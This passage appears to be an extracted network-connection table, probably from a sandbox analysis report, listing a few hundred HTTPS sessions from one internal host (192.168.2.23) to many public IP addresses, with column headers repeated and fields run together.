                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14371192.168.2.2334410221.99.80.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14372192.168.2.2358858131.149.217.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14373192.168.2.234992417.219.16.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14374192.168.2.2358734203.115.200.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14375192.168.2.2339618191.249.76.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14376192.168.2.234357090.104.61.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14377192.168.2.234947846.57.170.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14378192.168.2.234549447.176.179.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14379192.168.2.2356880142.66.105.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14380192.168.2.2352886138.120.151.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14381192.168.2.234423086.128.242.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14382192.168.2.233505082.80.47.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14383192.168.2.2348302209.227.74.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14384192.168.2.235856031.27.79.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14385192.168.2.2335756121.0.39.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14386192.168.2.2354368165.128.151.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14387192.168.2.235524472.33.41.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14388192.168.2.2334114164.254.224.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14389192.168.2.2352550165.185.240.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14390192.168.2.234192419.52.248.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14391192.168.2.234033039.162.164.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14392192.168.2.235443450.72.198.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14393192.168.2.233798050.97.242.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14394192.168.2.234111867.251.143.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14395192.168.2.2353834221.169.196.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14396192.168.2.2348492111.99.97.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14397192.168.2.2333054188.177.143.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14398192.168.2.2342438189.232.237.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14399192.168.2.2360968133.126.150.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14400192.168.2.2355006201.62.236.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14401192.168.2.2360620212.85.186.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14402192.168.2.2360090205.100.48.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14403192.168.2.2336476114.76.183.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14404192.168.2.2351864124.11.50.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14405192.168.2.23521269.217.149.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14406192.168.2.2346614121.105.95.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14407192.168.2.2348854195.3.227.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14408192.168.2.233635276.182.76.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14409192.168.2.234433673.245.215.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14410192.168.2.2339908207.218.56.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14411192.168.2.2349950139.177.79.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14412192.168.2.235793292.55.14.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14413192.168.2.233610039.25.45.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14414192.168.2.2348874121.96.139.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14415192.168.2.2358434137.78.53.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14416192.168.2.235150687.154.100.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14417192.168.2.234825890.135.44.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14418192.168.2.2341438102.51.113.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14419192.168.2.2352240210.221.56.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14420192.168.2.2344470125.18.237.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14421192.168.2.2359190112.128.203.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14422192.168.2.235407249.193.253.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14423192.168.2.2343200192.18.106.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14424192.168.2.2360536220.96.68.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14425192.168.2.235081866.40.196.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14426192.168.2.2354926169.232.124.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14427192.168.2.2360114138.153.253.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14428192.168.2.2333358203.164.104.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14429192.168.2.23346261.168.212.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14430192.168.2.235769261.69.87.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14431192.168.2.234403293.14.222.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14432192.168.2.2351908120.144.134.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14433192.168.2.2359808190.115.181.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14434192.168.2.2340388144.195.47.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14435192.168.2.234424263.158.245.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14436192.168.2.2349308212.111.215.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14437192.168.2.2353430212.70.35.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14438192.168.2.234420424.3.159.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14439192.168.2.233440034.183.193.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14440192.168.2.234986231.190.122.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14441192.168.2.234835446.50.67.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14442192.168.2.235271478.229.37.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14443192.168.2.234559453.77.124.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14444192.168.2.235572237.93.232.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14445192.168.2.2337082191.137.51.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14446192.168.2.233302642.3.14.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14447192.168.2.2351180169.136.224.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14448192.168.2.233814652.79.174.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14449192.168.2.234031242.129.29.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14450192.168.2.235756691.110.250.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14451192.168.2.2358982223.97.193.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14452192.168.2.2334444198.50.186.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14453192.168.2.2341078188.148.215.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14454192.168.2.235398485.254.226.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14455192.168.2.2348898189.203.184.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14456192.168.2.2352044207.35.106.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14457192.168.2.2355542197.86.159.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14458192.168.2.2357826107.196.219.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14459192.168.2.233488091.230.166.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14460192.168.2.234355013.193.242.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14461192.168.2.235462079.11.199.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14462192.168.2.235153246.218.214.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14463192.168.2.2335886210.101.36.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14464192.168.2.235348419.51.14.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14465192.168.2.234244098.127.1.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14466192.168.2.233302834.123.167.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14467192.168.2.234742298.69.90.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14468192.168.2.2343510192.207.148.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14469192.168.2.2356800100.56.121.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14470192.168.2.2344840181.45.81.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14471192.168.2.2340710101.227.57.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14472192.168.2.2354204198.2.19.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14473192.168.2.233467489.16.238.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14474192.168.2.2337776192.67.40.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14475192.168.2.235379874.34.127.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14476192.168.2.234794470.245.49.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14477192.168.2.23566181.245.35.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14478192.168.2.2348656204.46.209.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14479192.168.2.233704237.44.176.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14480192.168.2.234831832.133.49.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14481192.168.2.235110671.10.79.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14482192.168.2.2343516188.18.53.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14483192.168.2.235737496.41.155.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14484192.168.2.2349932104.3.34.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14485192.168.2.2353106139.122.219.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14486192.168.2.233581896.44.68.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14487192.168.2.2351424203.43.198.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14488192.168.2.234498499.6.119.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14489192.168.2.2350272192.147.175.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14490192.168.2.2335756144.166.90.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14491192.168.2.2352062129.101.246.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14492192.168.2.2332924154.78.105.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14493192.168.2.2336858112.86.159.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14494192.168.2.23562845.20.49.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14495192.168.2.2343368218.130.242.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14496192.168.2.2340660212.207.19.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14497192.168.2.23434484.111.7.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14498192.168.2.2339812134.205.183.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14499192.168.2.2355574112.190.6.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14500192.168.2.2356580211.0.248.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14501192.168.2.234398265.52.56.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14502192.168.2.2344690212.153.214.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14503192.168.2.2333556169.207.204.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14504192.168.2.235309025.46.215.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14505192.168.2.235253065.107.57.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14506192.168.2.2339838166.242.121.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14507192.168.2.2358784150.8.149.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14508192.168.2.234046874.158.126.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14509192.168.2.2338000167.180.129.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14510192.168.2.234984057.129.30.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14511192.168.2.233913025.165.187.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14512192.168.2.235983458.182.109.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14513192.168.2.2344622138.136.17.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14514192.168.2.2343484178.162.230.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14515192.168.2.234827261.220.26.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14516192.168.2.235239258.221.73.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14517192.168.2.234920678.146.207.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14518192.168.2.234196499.131.123.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14519192.168.2.2346104101.57.44.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14520192.168.2.2337606164.89.151.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14521192.168.2.234534644.145.60.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14522192.168.2.235783454.235.191.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14523192.168.2.235445483.16.206.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14524192.168.2.2354752102.122.184.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14525192.168.2.2354360154.141.58.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14526192.168.2.2333346219.122.136.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14527192.168.2.2352048155.145.143.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14528192.168.2.2343278157.36.150.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14529192.168.2.2343292216.124.60.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14530192.168.2.2335166104.152.34.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14531192.168.2.2351250168.249.228.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14532192.168.2.2341982123.95.103.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14533192.168.2.233743631.61.230.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14534192.168.2.235553044.152.174.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14535192.168.2.2347530106.241.36.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14536192.168.2.2352030219.158.141.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14537192.168.2.235977251.124.68.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14538192.168.2.2354362203.47.48.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14539192.168.2.234588896.39.0.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14540192.168.2.2359660158.100.178.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14541192.168.2.235207092.236.219.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14542192.168.2.23533729.89.217.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14543192.168.2.2341956219.171.130.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14544192.168.2.235998823.14.87.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14545192.168.2.234562843.133.191.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14546192.168.2.235380231.204.66.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14547192.168.2.2340524121.134.139.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14548192.168.2.236083283.115.211.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14549192.168.2.2345394118.141.244.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14550192.168.2.2335634133.166.121.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14551192.168.2.2348062216.45.9.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14552192.168.2.234208495.254.157.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14553192.168.2.2339874129.52.237.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14554192.168.2.235550419.205.215.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14555192.168.2.2360808182.27.171.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14556192.168.2.2351750125.155.89.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14557192.168.2.235729627.1.206.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14558192.168.2.2344130109.167.46.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14559192.168.2.234505498.14.103.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14560192.168.2.2341244104.221.51.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14561192.168.2.2359522194.214.57.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14562192.168.2.23595544.229.16.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14563192.168.2.234461291.115.140.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14564192.168.2.234554491.110.197.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14565192.168.2.2354576205.32.236.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14566192.168.2.233696412.193.152.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14567192.168.2.23461948.104.174.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14568192.168.2.2347428108.108.85.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14569192.168.2.235509079.229.18.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14570192.168.2.2360392129.64.191.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14571192.168.2.2348172195.177.218.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14572192.168.2.2350450133.63.118.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14573192.168.2.235123480.19.50.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14574192.168.2.2346638186.175.199.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14575192.168.2.2339334183.182.27.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14576192.168.2.234024286.198.147.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14577192.168.2.233389275.72.2.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14578192.168.2.2345960218.241.217.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14579192.168.2.2344292137.141.250.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14580192.168.2.2356678177.144.58.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14581192.168.2.2341622171.50.19.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14582192.168.2.2353328219.14.248.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14583192.168.2.235820492.111.246.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14584192.168.2.2335972216.154.188.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14585192.168.2.2346232203.72.71.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14586192.168.2.2348154129.71.161.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14587192.168.2.233420637.141.72.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14588192.168.2.233683879.249.103.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14589192.168.2.2335542205.85.179.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14590192.168.2.2353156139.55.249.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14591192.168.2.234560854.146.193.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14592192.168.2.2356990186.35.225.31443
